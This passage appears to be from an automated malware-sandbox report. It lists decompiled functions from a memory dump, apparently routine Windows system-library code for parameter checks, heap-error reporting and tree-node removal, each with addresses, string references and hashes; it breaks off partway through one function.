Instruction Fuzzy Hash: 31318E79A05285DFEB15CB68E488B8DBBB2FBCC310F18875AC505BB241C334A9C0CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1E3B1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E1E3B1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E1E3EBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E1E3EA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E1E3EA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L1E3C4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x1e3b1b8f
0x1e3b1b9a
0x1e3b1b9c
0x1e3b1b9e
0x1e3b1ba3
0x1e407010
0x1e407010
0x00000000
0x1e3b1ba9
0x1e3b1ba9
0x1e3b1bae
0x00000000
0x1e3b1bc5
0x1e3b1bca
0x1e3b1bcf
0x1e3b1bd0
0x1e3b1bd1
0x1e3b1bd2
0x1e3b1bd6
0x1e3b1bdc
0x1e3b1be0
0x1e406ffc
0x1e407000
0x00000000
0x1e407006
0x1e407009
0x1e407009
0x1e3b1be6
0x1e3b1bec
0x1e3b1c0b
0x1e3b1c0b
0x1e3b1c0c
0x1e3b1c11
0x1e3b1c12
0x1e3b1c15
0x1e3b1c1b
0x1e3b1c1f
0x1e3b1c31
0x1e3b1c33
0x1e407026
0x1e407026
0x1e3b1c21
0x1e3b1c24
0x1e3b1c24
0x1e3b1bee
0x1e3b1bee
0x1e3b1bf2
0x1e3b1c3a
0x1e3b1bf4
0x1e3b1bf4
0x1e3b1c05
0x1e3b1c05
0x1e3b1c09
0x1e3b1c3e
0x00000000
0x00000000
0x00000000
0x1e3b1c09
0x1e3b1bec
0x1e3b1be0
0x1e3b1bae
0x1e3b1c2e

Strings

WindowsExcludedProcs, xrefs: 1E3B1BC5

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: eff58f50d8777a933d42f7b47b403230a855e317160da539e790b1e5fa7866f2
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 3D21F576901238ABCB22DE558884F8B77EEAF80650F024736FD058B600D630DE0197E1

Uniqueness

Uniqueness Score: -1.00%

Function 1E3CF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1E3CF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x1e3cf71d
0x1e3cf722
0x1e3cf726
0x1e414770
0x1e3cf765
0x1e3cf769
0x1e3cf769
0x1e3cf732
0x1e41477a
0x00000000
0x1e41477a
0x1e3cf738
0x1e3cf73a
0x1e3cf73c
0x1e3cf73f
0x1e3cf746
0x1e3cf778
0x1e3cf7a9
0x1e3cf7a9
0x1e3cf754
0x1e3cf75a
0x1e3cf75d
0x1e3cf75f
0x1e3cf761
0x1e3cf76f
0x1e3cf771
0x1e3cf771
0x1e3cf76f
0x1e3cf763
0x00000000
0x1e3cf763
0x1e3cf77d
0x1e3cf7a3
0x1e3cf7a5
0x00000000
0x1e3cf7a5
0x1e3cf77f
0x1e3cf782
0x1e3cf784
0x1e3cf786
0x00000000
0x00000000
0x00000000
0x1e3cf788
0x1e3cf748
0x1e3cf74d
0x1e3cf78d
0x1e3cf793
0x1e3cf7b7
0x1e3cf7bc
0x00000000
0x1e3cf7bc
0x1e3cf798
0x00000000
0x00000000
0x1e3cf79d
0x1e3cf7b0
0x00000000
0x1e3cf7b0
0x1e3cf79f
0x00000000
0x1e3cf74f
0x1e3cf74f
0x00000000
0x1e3cf74f

Strings

Actx , xrefs: 1E3CF73F

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: bc078b270c13606edfded04091e75b3de1c821ef0c02bdd6a9d7a45649991849
Instruction ID: d814afdc02c384aa88b3752e73edbac61e1865b7b83c539e904eb539979edf71
Opcode Fuzzy Hash: bc078b270c13606edfded04091e75b3de1c821ef0c02bdd6a9d7a45649991849
Instruction Fuzzy Hash: EE11BF397047438BEB144F1A88A072672DBEB866E4F21472BE461CB791DB73DCC08340

Uniqueness

Uniqueness Score: -1.00%

Function 1E458DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E1E458DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1e480d50);
				E1E3FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E1E435720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E1E3FDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E1E3FDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E1E3FD130(_t34, _t39, _t40);
			}

0x1e458df1
0x1e458df1
0x1e458df1
0x1e458df1
0x1e458df1
0x1e458df1
0x1e458df3
0x1e458df8
0x1e458dfd
0x1e458e00
0x1e458e0e
0x1e458e2a
0x1e458e36
0x1e458e38
0x1e458e3c
0x1e458e46
0x1e458e46
0x1e458e36
0x1e458e50
0x1e458e56
0x1e458e59
0x1e458e5c
0x1e458e60
0x1e458e67
0x1e458e6d
0x1e458e73
0x1e458e74
0x1e458eb1
0x1e458ebd

Strings

Critical error detected %lx, xrefs: 1E458E21

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 2e93132e55b37f03620b678dc0bb38b36a0027fc3d474fa24480ffec91787271
Instruction ID: b94baee887f22f64ed56383ccb83a5eafb2d1074a88f5b1ead0ff4fe734f928d
Opcode Fuzzy Hash: 2e93132e55b37f03620b678dc0bb38b36a0027fc3d474fa24480ffec91787271
Instruction Fuzzy Hash: E5112375C14388DAEB15CFA98909B9CFBB1AB08311F60466ED529AB392C7345602DF15

Uniqueness

Uniqueness Score: -1.00%

Function 1E3AF900, Relevance: .9, Instructions: 863
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E1E3AF900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
